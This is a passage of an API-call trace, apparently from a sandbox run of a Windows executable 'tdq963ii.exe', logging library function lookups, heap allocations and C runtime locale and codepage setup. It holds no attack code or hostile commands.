(hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0089.099] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0089.099] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0089.099] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0089.099] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0089.099] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0089.100] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0089.100] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0089.100] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0089.100] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0089.100] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0089.100] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0089.101] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0089.101] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0089.101] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0089.101] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0089.101] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0089.102] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0089.102] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0089.102] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0089.102] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0089.102] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0089.102] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0089.102] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0089.102] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0089.103] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0089.103] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0089.103] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0089.103] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0089.103] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0089.103] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0089.103] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0089.103] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0089.103] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0089.103] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0089.104] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0089.109] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x7b95a80, dwHighDateTime=0x1d68287)) [0089.109] GetCurrentThreadId () returned 0x80c [0089.109] GetCurrentProcessId () returned 0x85c [0089.109] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=20944807975) returned 1 [0089.114] GetProcessHeap () returned 0x500000 [0090.061] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0090.061] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0090.062] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0090.063] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0090.210] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3bc) returned 0x5170b0 [0090.210] GetCurrentThreadId () returned 0x80c [0090.210] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x18) returned 0x517478 [0090.210] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x800) returned 0x517498 [0090.210] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula \"RacWmiDatabase.sdf\" -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0xe607b0c8, hStdError=0x0)) [0090.210] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0090.210] GetFileType (hFile=0x3) returned 0x2 [0090.211] GetStdHandle (nStdHandle=0xfffffff5) returned 0x80 [0090.211] GetFileType (hFile=0x80) returned 0x3 [0090.211] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0090.211] GetFileType (hFile=0xb) returned 0x2 [0090.212] GetCommandLineW () returned="tdq963ii.exe -accepteula \"RacWmiDatabase.sdf\" -nobanner" [0090.212] GetEnvironmentStringsW () returned 0x517ca0* [0090.212] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0xb8c) returned 0x518838 [0090.215] FreeEnvironmentStringsW (penv=0x517ca0) returned 1 [0090.215] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0090.215] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x80) returned 0x517ca0 [0090.217] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xa0) returned 0x517d28 [0090.217] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3e) returned 0x514de0 [0090.219] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x6c) returned 0x517dd0 [0090.219] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x6e) returned 0x517e48 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x78) returned 0x50f910 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x62) returned 0x517ec0 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x517f30 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x517f68 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x517fb8 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x28) returned 0x517ff0 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1a) returned 0x516a80 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x4a) returned 0x518020 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x72) returned 0x50f990 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x518078 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x5180b0 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1c) returned 0x516aa8 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0xd2) returned 0x5180e8 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x7c) returned 0x5181c8 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x36) returned 0x518250 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3a) returned 0x514e28 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x90) returned 0x518290 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x518328 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x518358 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x36) returned 0x518390 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x48) returned 0x5183d0 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x52) returned 0x518420 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3c) returned 0x514e70 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x18) returned 0x518480 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x82) returned 0x5184a0 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2e) returned 0x518530 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x1e) returned 0x516ad0 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2c) returned 0x518568 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x54) returned 0x5185a0 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x52) returned 0x518600 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x2a) returned 0x518660 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x3c) returned 0x514eb8 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x54) returned 0x518698 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x24) returned 0x5186f8 [0090.220] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x30) returned 0x518728 [0090.221] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x8c) returned 0x518760 [0090.221] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x518838 | out: hHeap=0x500000) returned 1 [0090.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x8, Size=0x800) returned 0x5187f8 [0090.239] GetLastError () returned 0x0 [0090.239] SetLastError (dwErrCode=0x0) [0090.239] GetLastError () returned 0x0 [0090.239] SetLastError (dwErrCode=0x0) [0090.239] GetLastError () returned 0x0 [0090.239] SetLastError (dwErrCode=0x0) [0090.239] GetACP () returned 0x4e4 [0090.239] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x220) returned 0x519000 [0090.239] GetLastError () returned 0x0 [0090.239] SetLastError (dwErrCode=0x0) [0090.239] IsValidCodePage (CodePage=0x4e4) returned 1 [0090.239] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0090.240] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0090.258] GetLastError () returned 0x0 [0090.258] SetLastError (dwErrCode=0x0) [0090.258] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0090.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0090.260] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0090.260] GetLastError () returned 0x0 [0090.260] SetLastError (dwErrCode=0x0) [0090.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0090.260] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0090.260] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0090.260] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0090.260] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿX±\x07æäþ\x18", lpUsedDefaultChar=0x0) returned 256 [0090.260] GetLastError () returned 0x0 [0090.260] SetLastError (dwErrCode=0x0) [0090.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0090.261] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0090.261] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0090.261] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0090.261] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 